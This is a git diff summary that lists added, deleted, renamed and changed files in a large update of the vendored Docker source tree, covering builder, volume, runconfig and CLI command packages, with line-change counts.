.../docker/docker/reports/2017-06-26.md | 120 + .../docker/reports/builder/2017-05-01.md | 47 + .../docker/reports/builder/2017-05-08.md | 57 + .../docker/reports/builder/2017-05-15.md | 64 + .../docker/reports/builder/2017-05-22.md | 47 + .../docker/reports/builder/2017-05-29.md | 52 + .../docker/reports/builder/2017-06-05.md | 58 + .../docker/reports/builder/2017-06-12.md | 58 + .../docker/reports/builder/2017-06-26.md | 78 + .../docker/reports/builder/2017-07-10.md | 65 + .../docker/reports/builder/2017-07-17.md | 79 + .../docker/restartmanager/restartmanager.go | 15 +- .../restartmanager/restartmanager_test.go | 16 +- .../docker/docker/runconfig/config.go | 50 +- .../docker/docker/runconfig/config_test.go | 75 +- .../docker/docker/runconfig/config_unix.go | 4 +- .../docker/docker/runconfig/config_windows.go | 2 +- .../docker/docker/runconfig/errors.go | 50 +- .../docker/docker/runconfig/hostconfig.go | 52 +- .../docker/runconfig/hostconfig_solaris.go | 41 - .../docker/runconfig/hostconfig_test.go | 84 +- .../docker/runconfig/hostconfig_unix.go | 79 +- .../docker/runconfig/hostconfig_windows.go | 62 +- .../runconfig/hostconfig_windows_test.go | 17 + .../docker/docker/runconfig/opts/envfile.go | 81 - .../docker/runconfig/opts/envfile_test.go | 142 - .../docker/runconfig/opts/fixtures/utf16.env | Bin 54 -> 0 bytes .../runconfig/opts/fixtures/utf16be.env | Bin 54 -> 0 bytes .../docker/runconfig/opts/fixtures/utf8.env | 3 - .../docker/runconfig/opts/fixtures/valid.env | 1 - .../runconfig/opts/fixtures/valid.label | 1 - .../docker/docker/runconfig/opts/opts.go | 83 - .../docker/docker/runconfig/opts/opts_test.go | 113 - .../docker/docker/runconfig/opts/parse.go | 977 +-- .../docker/runconfig/opts/parse_test.go | 894 --- .../docker/runconfig/opts/throttledevice.go | 111 - .../docker/runconfig/opts/weightdevice.go | 89 - .../github.com/docker/docker/utils/debug.go | 26 - .../docker/docker/utils/process_windows.go | 20 - .../docker/utils/templates/templates.go | 42 - 
.../docker/utils/templates/templates_test.go | 38 - .../github.com/docker/docker/utils/utils.go | 87 - vendor/github.com/docker/docker/vendor.conf | 164 +- .../docker/docker/volume/drivers/adapter.go | 73 +- .../docker/docker/volume/drivers/extpoint.go | 218 +- .../docker/volume/drivers/extpoint_test.go | 9 +- .../docker/docker/volume/drivers/proxy.go | 33 +- .../docker/volume/drivers/proxy_test.go | 2 +- .../docker/docker/volume/local/local.go | 116 +- .../docker/docker/volume/local/local_test.go | 73 +- .../docker/docker/volume/local/local_unix.go | 16 +- .../docker/volume/local/local_windows.go | 14 +- .../docker/volume/mounts/lcow_parser.go | 34 + .../docker/volume/mounts/linux_parser.go | 417 ++ .../docker/docker/volume/mounts/mounts.go | 170 + .../docker/docker/volume/mounts/parser.go | 47 + .../docker/volume/mounts/parser_test.go | 480 ++ .../docker/docker/volume/mounts/validate.go | 28 + .../docker/volume/mounts/validate_test.go | 73 + .../validate_unix_test.go} | 2 +- .../validate_windows_test.go} | 2 +- .../docker/volume/{ => mounts}/volume_copy.go | 6 +- .../docker/volume/mounts/volume_unix.go | 18 + .../docker/volume/mounts/volume_windows.go | 8 + .../docker/volume/mounts/windows_parser.go | 456 ++ .../docker/docker/volume/service/by.go | 89 + .../docker/docker/volume/service/convert.go | 132 + .../docker/volume/{store => service}/db.go | 15 +- .../docker/docker/volume/service/db_test.go | 52 + .../docker/volume/service/default_driver.go | 21 + .../volume/service/default_driver_stubs.go | 10 + .../volume/{store => service}/errors.go | 59 +- .../docker/docker/volume/service/opts/opts.go | 89 + .../volume/{store => service}/restore.go | 14 +- .../docker/volume/service/restore_test.go | 58 + .../docker/docker/volume/service/service.go | 243 + .../volume/service/service_linux_test.go | 66 + .../docker/volume/service/service_test.go | 253 + .../docker/volume/{store => service}/store.go | 581 +- .../docker/volume/service/store_test.go | 421 ++ 
.../docker/volume/service/store_unix.go | 9 + .../{store => service}/store_windows.go | 6 +- .../docker/docker/volume/store/store_test.go | 234 - .../docker/docker/volume/store/store_unix.go | 9 - .../docker/volume/testutils/testutils.go | 119 +- .../docker/docker/volume/validate.go | 125 - .../docker/docker/volume/validate_test.go | 43 - .../github.com/docker/docker/volume/volume.go | 264 +- .../docker/docker/volume/volume_copy_unix.go | 8 - .../docker/volume/volume_copy_windows.go | 6 - .../docker/docker/volume/volume_linux.go | 56 - .../docker/docker/volume/volume_linux_test.go | 51 - .../docker/volume/volume_propagation_linux.go | 47 - .../volume/volume_propagation_linux_test.go | 65 - .../volume/volume_propagation_unsupported.go | 24 - .../docker/docker/volume/volume_test.go | 269 - .../docker/docker/volume/volume_unix.go | 138 - .../docker/volume/volume_unsupported.go | 16 - .../docker/docker/volume/volume_windows.go | 201 - 2656 files changed, 107914 insertions(+), 137977 deletions(-) create mode 100644 vendor/github.com/docker/docker/.DEREK.yml create mode 100644 vendor/github.com/docker/docker/.github/CODEOWNERS delete mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/Dockerfile.e2e delete mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le delete mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x delete mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/TESTING.md delete mode 100644 vendor/github.com/docker/docker/VERSION delete mode 100644 vendor/github.com/docker/docker/api/common_test.go delete mode 100644 vendor/github.com/docker/docker/api/errors/errors.go create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/tag.go create mode 
100644 vendor/github.com/docker/docker/api/server/httputils/httputils_test.go delete mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug_test.go delete mode 100644 vendor/github.com/docker/docker/api/server/profiler.go create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug.go create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter_test.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/helpers.go create mode 100644 vendor/github.com/docker/docker/api/types/backend/build.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_changes.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_top.go create mode 100644 vendor/github.com/docker/docker/api/types/container/waitcondition.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/example_test.go create mode 100644 vendor/github.com/docker/docker/api/types/graph_driver_data.go create mode 100644 vendor/github.com/docker/docker/api/types/image/image_history.go create mode 100644 
vendor/github.com/docker/docker/api/types/image_delete_response_item.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/config.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto rename vendor/github.com/docker/docker/api/types/volume/{volumes_create.go => volume_create.go} (84%) rename vendor/github.com/docker/docker/api/types/volume/{volumes_list.go => volume_list.go} (78%) create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/builder.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/controller.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_unix.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_windows.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/exporter/export.go create mode 100644 
vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/worker/worker.go delete mode 100644 vendor/github.com/docker/docker/builder/context.go delete mode 100644 vendor/github.com/docker/docker/builder/context_test.go delete mode 100644 vendor/github.com/docker/docker/builder/context_unix.go delete mode 100644 vendor/github.com/docker/docker/builder/context_windows.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/clientsession.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go 
create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/metrics.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile delete mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile delete mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile delete mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go delete mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest delete mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go create mode 100644 vendor/github.com/docker/docker/builder/fscache/fscache.go create mode 100644 vendor/github.com/docker/docker/builder/fscache/fscache_test.go create mode 100644 vendor/github.com/docker/docker/builder/fscache/naivedriver.go delete mode 100644 vendor/github.com/docker/docker/builder/git.go delete mode 100644 vendor/github.com/docker/docker/builder/remote.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/archive.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/detect.go rename vendor/github.com/docker/docker/builder/{dockerignore_test.go => remotecontext/detect_test.go} (58%) create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/filehash.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/generate.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go rename vendor/github.com/docker/docker/{pkg/httputils => builder/remotecontext}/mimetype.go (63%) create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/remote.go rename vendor/github.com/docker/docker/builder/{ => remotecontext}/remote_test.go (62%) create mode 100644 
vendor/github.com/docker/docker/builder/remotecontext/tarsum.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go rename vendor/github.com/docker/docker/builder/{ => remotecontext}/utils_test.go (66%) delete mode 100644 vendor/github.com/docker/docker/builder/tarsum.go delete mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/cli.go delete mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/container/hijack.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/events_utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/image/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/in.go delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/node/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/out.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/upgrade.go delete mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/secret/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go delete 
